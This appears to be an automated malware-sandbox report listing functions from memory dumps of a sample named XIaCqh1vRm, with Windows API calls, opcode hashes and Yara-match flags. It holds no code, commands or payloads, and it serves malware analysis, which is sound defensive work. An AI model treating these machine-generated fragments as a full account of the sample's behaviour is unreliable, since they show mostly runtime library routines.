                                                                                                                                                                                                                                                                          • API String ID: 2287132625-0
                                                                                                                                                                                                                                                                          • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                                                          • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                                                                                                                                                                                                                                          Function 024CBBA9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: _free.LIBCMT ref: 024C21A0
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
                                                                                                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024CBCB5
                                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 024CBD10
                                                                                                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 024CBD1F
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,024C0A1C,00000040,?,024C0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024CBD67
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,024C0A9C,00000040), ref: 024CBD86
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2287132625-0
                                                                                                                                                                                                                                                                          • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                                          • Instruction ID: 0234186ece980b335b2201505978ecfd96848d35706020ce265d594a3b812761
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F15193799002099BEB51DFA9DC42ABF77B9FF14708F24042FE901E7290EB719A41CB61
                                                                                                                                                                                                                                                                          Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: C$C
                                                                                                                                                                                                                                                                          • API String ID: 0-238425240
                                                                                                                                                                                                                                                                          • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                                                                                                                                                                                          • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                                                                                                                                                                                                                                          Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2444527052-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                                                                                                                                                                                          • Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
                                                                                                                                                                                                                                                                          Function 024CB271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                                                            • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024C0A23,?,?,?,?,024C047A,?,00000004), ref: 024CB353
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 024CB3E3
                                                                                                                                                                                                                                                                          • _wcschr.LIBVCRUNTIME ref: 024CB3F1
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024C0A23,00000000,024C0B43), ref: 024CB494
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2444527052-0
                                                                                                                                                                                                                                                                          • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                                                          • Instruction ID: 807a92623273bad5a0fc5b797991b55d28319ce553299938bf2ac813a247c003
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E861FB79604206AAD765AF3DDC46BBB73ADEF04718F24402FE905D7280EB74D540CB65
                                                                                                                                                                                                                                                                          Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                            • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorInfoLastLocale$_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2834031935-0
                                                                                                                                                                                                                                                                          • Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                                                                                                                                                                                          • Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
                                                                                                                                                                                                                                                                          Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                          • Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                                                          • Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
                                                                                                                                                                                                                                                                          Function 024BA63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0249DAD7), ref: 024BA732
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0249DAD7), ref: 024BA73C
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0249DAD7), ref: 024BA749
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                          • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                                                          • Instruction ID: bcd2dae695cca78a1cf2393b09307dd5b9720e163ffa21b8a3c6072774895f94
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F831C67490122C9BCB21DF69D9887DDBBB8BF19710F5041EAE40CA7250E7709B858F54
                                                                                                                                                                                                                                                                          Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0042FE99
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                          • Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
                                                                                                                                                                                                                                                                          Function 024C00C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,024C009C,00000000,00457970,0000000C,024C01F3,00000000,00000002,00000000), ref: 024C00E7
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,024C009C,00000000,00457970,0000000C,024C01F3,00000000,00000002,00000000), ref: 024C00EE
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 024C0100
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                          • Instruction ID: 94596048c1fa0f4895347fcea5cbe06743c4e0f01de4d51cbf750717c5248447
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36E04639000148EBCF526F99DD08A493B6AEB02B52F20402DF9048B230CB36EA42DE44
                                                                                                                                                                                                                                                                          Function 0249092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                                          • API String ID: 0-2784972518
                                                                                                                                                                                                                                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                          • Instruction ID: 11c3ce01d4b21e2cad106f8ee3e8e99851c685a3892a5c7049a3e18a3c7c256e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 153139B6900609DFDB10CF99C880AAEBBF9FF48328F15514AD841AB310D771EA45CFA4
                                                                                                                                                                                                                                                                          Function 004389F2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: /
                                                                                                                                                                                                                                                                          • API String ID: 0-2043925204
                                                                                                                                                                                                                                                                          • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                                                          • Instruction ID: b1d1c733bd69e792f2c7091433d2a564ecb1a1065cd437496777377bd66813c7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A412B725003196FCB20AFB9DC49EBBB778EB88714F50566EF905D7280EA34AD41CB58
                                                                                                                                                                                                                                                                          Function 024C8C59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: /
                                                                                                                                                                                                                                                                          • API String ID: 0-2043925204
                                                                                                                                                                                                                                                                          • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                                          • Instruction ID: f2770f8a9dcd4ba6199dd1f4cf84a48872e5b76d7781d084af10b5db9c307d3d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2841087A500219AECB219FBDDC48EAB77B9EF84714F60466EF905D7280E7319D41CB50
                                                                                                                                                                                                                                                                          Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                                                          • Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                                                          • Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE
                                                                                                                                                                                                                                                                          Function 024BED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                                                          • Instruction ID: 6bc98911374f568c0420925b4315458e0cf8497bb0fef3618f73e48cfaf34742
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0022B71E002199BDF15CFA9C9806EEB7F1EF88314F15866AE919E7380D731A945CF90
                                                                                                                                                                                                                                                                          Function 02492605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0249262C
                                                                                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 024927CA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4264772764-0
                                                                                                                                                                                                                                                                          • Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                          • Instruction ID: 7fed65e829bdb85d7086353b8c6347e6979f9d2d992ed28c86823371e4499b97
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F412125964344A5E731FFA5BC45B2637B0FF64B26F10252BD528CB2B2E3B28540C75E
                                                                                                                                                                                                                                                                          Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                          • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                          • Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44
